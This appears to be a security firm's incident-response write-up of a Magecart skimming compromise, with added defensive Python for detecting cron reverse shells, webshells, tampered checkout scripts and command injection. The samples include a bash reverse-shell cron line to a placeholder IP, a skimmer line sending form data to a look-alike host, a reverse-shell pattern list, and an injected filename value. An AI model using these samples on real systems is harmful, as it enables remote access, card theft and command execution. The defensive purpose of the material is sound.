Everyone says there are two types of organizations: those who know they've been compromised, and those who don't. While there's certainly a lot of truth to this, in our time as a Managed Security Services Partner we've found there are generally three types: those who don't know they've been compromised, those who do know, and those who choose to do something about it.
No one ever likes to hear the phrase "You've been compromised." For many companies, it means dedicating resources they don't have to problems they may not have the tools, staff, or time to solve. MSS partners, however, are well equipped to handle incidents like this, from the initial investigation all the way to resolution, and can provide ongoing detection services so that any further attacks are caught and problems like this don't happen again.
Today, we're taking a closer look at a Magecart attack. Magecart is a collection of criminal groups that gain (and sell) unauthorized access to public-facing assets. Once access has been obtained, Magecart operatives will usually compromise JavaScript or PHP files to maintain control of the website and to skim checkout and shopping-cart forms for payment information. Once the actor has completed their actions on objectives, they may further monetize the compromise by selling access to the victim's site.
While the groups initially started with Magento, Magecart has since spread to thousands of different websites and platforms. Companies as big as Amazon and PayPal have fallen victim to Magecart, alongside thousands of other e-commerce companies.
A recent Emagined customer discovered unauthorized files on an internet-facing web server. One of the malicious files contained references to aws-cdn[.]com, a known Magecart domain. The payload for this request was heavily obfuscated to avoid detection by traditional tools.
The investigation by the customer determined that an unapproved account was created to maintain control and persistence in the victim's environment. To further complicate the investigation, the actor deleted administration and authentication logs.
The company detected this new account and immediately reset admin passwords and revoked all admin sessions. Despite this, more malicious files were discovered on the web server shortly afterwards. That could only mean one thing: the attackers had another way in.
It was clear that this was a much bigger problem than a single malicious file. After this discovery, Emagined Security was brought on board for further investigation and incident response support.
Emagined Security's Incident Response Specialists began their investigation and discovered that an adversary was selling access to this victim's environment through an underground marketplace.
On the first day of the investigation, Emagined consultants discovered that a cron job had been set up on the compromised web server that launched a reverse shell, which is what allowed further malicious files to be added despite administrative access having been revoked. Log file analysis further showed that one of the PHP files on the website was acting as a PHP webshell.
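The two persistence mechanisms found on day one, a cron entry that spawns a reverse shell and a PHP file being driven as a webshell, are both visible in host and web server data. The following is an added triage example, not tooling from the original investigation: it flags cron entries matching common reverse-shell shapes and finds PHP paths that receive repeated POSTs from a single source. The crontab, the access-log lines, the pattern list and the POST threshold are all constructed assumptions.

```python
"""Added example (not part of the original write-up): triage helpers that flag
a cron entry carrying a reverse shell and a PHP file behaving like a webshell.
Sample data, patterns and thresholds below are constructed assumptions."""
import re
from collections import Counter, defaultdict

# Constructed crontab; the second entry is shaped like a periodic reverse-shell beacon.
SAMPLE_CRONTAB = """\
0 2 * * * /usr/local/bin/backup.sh >/var/log/backup.log 2>&1
*/5 * * * * bash -i >& /dev/tcp/203.0.113.10/4444 0>&1
30 3 * * 0 /usr/bin/certbot renew --quiet
"""

# Constructed combined-format access log lines (Apache/nginx style).
SAMPLE_ACCESS_LOG = """\
198.51.100.7 - - [10/Mar/2021:10:01:02 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Mar/2021:10:01:05 +0000] "GET /checkout.php HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
203.0.113.10 - - [10/Mar/2021:10:02:11 +0000] "POST /media/cache/x.php HTTP/1.1" 200 144 "-" "python-requests/2.25"
203.0.113.10 - - [10/Mar/2021:10:02:13 +0000] "POST /media/cache/x.php HTTP/1.1" 200 98 "-" "python-requests/2.25"
203.0.113.10 - - [10/Mar/2021:10:02:20 +0000] "POST /media/cache/x.php HTTP/1.1" 200 301 "-" "python-requests/2.25"
198.51.100.9 - - [10/Mar/2021:10:03:00 +0000] "POST /checkout.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Heuristics for shells launched from cron. Assumed starting list; extend for your fleet.
REVERSE_SHELL_PATTERNS = [
    re.compile(r"/dev/tcp/"),                 # bash network redirection
    re.compile(r"\bnc\b.*\s-e\b"),            # netcat handing a program a socket
    re.compile(r"\bbash\s+-i\b"),             # interactive bash from a non-interactive job
    re.compile(r"\b(python|perl|php)\S*\s+-[cre]\s.*socket"),  # one-liner socket shells
]


def suspicious_cron_entries(crontab_text):
    """Return (line_number, line) for cron entries matching the reverse-shell heuristics."""
    hits = []
    for lineno, line in enumerate(crontab_text.splitlines(), start=1):
        if any(p.search(line) for p in REVERSE_SHELL_PATTERNS):
            hits.append((lineno, line))
    return hits


LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def webshell_candidates(log_text, min_posts=3):
    """Return {path: {ip: count}} for PHP paths receiving repeated POSTs from one source.

    A webshell is usually driven by one operator address POSTing to a single PHP
    file that real users never touch; min_posts is an assumed threshold."""
    posts = defaultdict(Counter)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or m.group("method") != "POST" or not m.group("path").endswith(".php"):
            continue
        posts[m.group("path")][m.group("ip")] += 1
    return {path: dict(by_ip) for path, by_ip in posts.items()
            if any(n >= min_posts for n in by_ip.values())}


if __name__ == "__main__":
    for lineno, line in suspicious_cron_entries(SAMPLE_CRONTAB):
        print(f"cron line {lineno}: {line}")
    for path, by_ip in webshell_candidates(SAMPLE_ACCESS_LOG).items():
        print(f"possible webshell {path}: {by_ip}")
```

In a real engagement the crontab would come from every user's crontab and the `/etc/cron.*` directories, and the access-log pass would run over the full retention window; the point is that both mechanisms survive a password reset and session revocation, so the hunt has to cover the host, not just the admin accounts.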
The adversary was clearly skilled enough to maintain multiple ways into the victim's environment.
Once access was obtained, the adversaries modified static files and included code that forwarded payment data to a third-party website. This website looked very similar to the customer's legitimate website, likely an attempt to evade detection.
Emagined Security's investigators used the Wayback Machine from Archive.org to confirm the period of exposure for the customer's site. Since Magecart modifies JavaScript files, the skimmed payment data never went to the customer's website; it went to the third-party payment processor and to the actor's look-alike domain.
Additional victims were identified through the actor's infrastructure and similar look-alike domains in passive DNS.
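The skimmer pattern above, a modified static JavaScript file that sends a second copy of the form to a domain imitating the shop, can be caught on the defender's side by comparing deployed files against a release baseline and by scoring every external host a script talks to against the domains it should talk to. The example below is added here and is not the customer's or Emagined's tooling; the baseline script, the tampered script, the allowlist and the edit-distance threshold are constructed assumptions. The look-alike scorer also generalizes to the passive-DNS step: feed it candidate hostnames and it returns which legitimate domain each one mimics.

```python
"""Added example (not from the original post): detect a modified static
JavaScript file and the look-alike exfiltration domain it references.
Baseline content, allowlist and thresholds are constructed assumptions."""
import hashlib
import re

# Assumed allowlist: the shop itself and its real payment processor.
LEGITIMATE_DOMAINS = {"shop.example.com", "pay.example-processor.com"}

# Constructed "known good" checkout script as recorded at deployment time.
BASELINE_JS = """\
function submitOrder(form) {
  return fetch("https://pay.example-processor.com/v1/charge", {method: "POST", body: new FormData(form)});
}
"""

# Constructed tampered version: same function, plus a copy of the form sent to a look-alike host.
TAMPERED_JS = """\
function submitOrder(form) {
  var img = new Image(); img.src = "https://shop-example.com/img.gif?d=" + btoa(serialize(form));
  return fetch("https://pay.example-processor.com/v1/charge", {method: "POST", body: new FormData(form)});
}
"""

BASELINE_HASHES = {"js/checkout.js": hashlib.sha256(BASELINE_JS.encode()).hexdigest()}
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")


def changed_files(current):
    """Return paths whose SHA-256 no longer matches the deployment baseline."""
    return [p for p, body in current.items()
            if hashlib.sha256(body.encode()).hexdigest() != BASELINE_HASHES.get(p)]


def external_hosts(js_source):
    """Hosts referenced by absolute URLs in the script that are not on the allowlist."""
    return sorted(set(URL_RE.findall(js_source)) - LEGITIMATE_DOMAINS)


def edit_distance(a, b):
    """Levenshtein distance; small values between two hostnames mean one imitates the other."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_of(host, legit=LEGITIMATE_DOMAINS, max_distance=2):
    """Return the legitimate domain `host` imitates, or None. Threshold is assumed."""
    host = host.lower()
    if host.startswith("www."):
        host = host[4:]
    best = min(legit, key=lambda d: edit_distance(host, d))
    return best if edit_distance(host, best) <= max_distance else None


def triage(current):
    """For each changed file: its unexpected hosts and which legitimate domain each mimics."""
    report = {}
    for path in changed_files(current):
        report[path] = {h: lookalike_of(h) for h in external_hosts(current[path])}
    return report


if __name__ == "__main__":
    print(triage({"js/checkout.js": TAMPERED_JS}))
```

Because the skimmer runs in the shopper's browser, server-side request logs will never show the stolen data leaving; the file hash and the unexpected host in the script are the artifacts that do exist on the server, which is why a hash baseline taken at deployment time is worth keeping.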
Ultimately, Emagined Security was able to identify a single library in the customer's website that did not properly parse website variables. In the few places where this library was used, an attacker could manipulate the request to execute OS-level commands on the host.
This library was written and maintained by the victim organization and was not publicly available. The adversary's persistence, and likely a scanning tool, ultimately led to the full system compromise. The victim was able to rebuild their environment securely and patch the original vulnerability. The actors have been unable to access the machines since.
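The root cause, a request variable that reached the operating system without proper parsing, is a bug class rather than something specific to the victim's library. The example below is added here and is not the victim's code: it shows the unsafe pattern (splicing a request parameter into a shell command string) beside a hardened version (allowlist validation and an argument list that no shell ever interprets), with a helper that makes visible how many commands a shell would actually run from the unsafe string. The image-resize command, the paths and the parameter name are assumptions.

```python
"""Added example (not the victim's library): a request parameter reaching the
OS shell, shown as the unsafe pattern beside a hardened version.
The resize command, directories and parameter name are assumptions."""
import re
import shlex
import subprocess

UPLOAD_DIR = "/var/www/uploads"   # assumed
THUMB_DIR = "/var/www/thumbs"     # assumed


def build_command_unsafe(filename):
    """Vulnerable pattern: the request variable is spliced into a shell string.

    Returned instead of executed so the example runs safely; with shell=True the
    shell would parse the whole string, metacharacters included."""
    return f"convert {UPLOAD_DIR}/{filename} -resize 200x200 {THUMB_DIR}/{filename}"


def commands_a_shell_would_run(command_string):
    """Tokenise like a POSIX shell and return the command name of every segment.

    Used to show the defect: a safe request yields one command, a manipulated
    one yields several."""
    lex = shlex.shlex(command_string, posix=True, punctuation_chars=True)
    commands, at_segment_start = [], True
    for tok in lex:
        if tok in {";", "&&", "||", "|", "&"}:
            at_segment_start = True
        elif at_segment_start:
            commands.append(tok)
            at_segment_start = False
    return commands


# Hardened: only shapes the application actually expects are accepted.
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}\.(png|jpg|jpeg)")


def build_command_safe(filename):
    """Allowlist-validate the variable, then build an argv list; no shell parses it."""
    if not SAFE_NAME.fullmatch(filename):
        raise ValueError("rejected filename")
    return ["convert", f"{UPLOAD_DIR}/{filename}", "-resize", "200x200", f"{THUMB_DIR}/{filename}"]


def run_safe(filename):
    """Execute the hardened form. shell=False means argv goes straight to execve."""
    return subprocess.run(build_command_safe(filename), shell=False, check=True, capture_output=True)


if __name__ == "__main__":
    for value in ("photo.png", "photo.png; id"):
        print(value, "->", commands_a_shell_would_run(build_command_unsafe(value)))
        try:
            print("  hardened argv:", build_command_safe(value))
        except ValueError as exc:
            print("  hardened:", exc)
```

Validation alone is not the fix and the argument list alone is not the fix either: the allowlist stops unexpected input at the boundary, and the argv form removes the shell so that any value that does slip through is passed as a single argument rather than re-parsed. A scanner of the kind the investigators suspected would be testing exactly the boundary the unsafe version leaves open.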
It is important to note that while there were atomic indicators associated with this threat, they change from one environment to the next. In some cases they change even more often than that, as the obfuscator used by Magecart makes individual file hashes a moot point.
The actors, however, were unable to hide their tactics and techniques. Their playbooks are well established, and in the end it was that playbook, together with some great detective work, that was their undoing.
Defense in depth is one of the most crucial defenses against malicious groups, hackers, and APTs for any organization. If you have any questions about how Emagined Security could protect your environment or would like to learn more about the services Emagined offers, such as MSS services, incident response, and penetration testing services, feel free to contact us.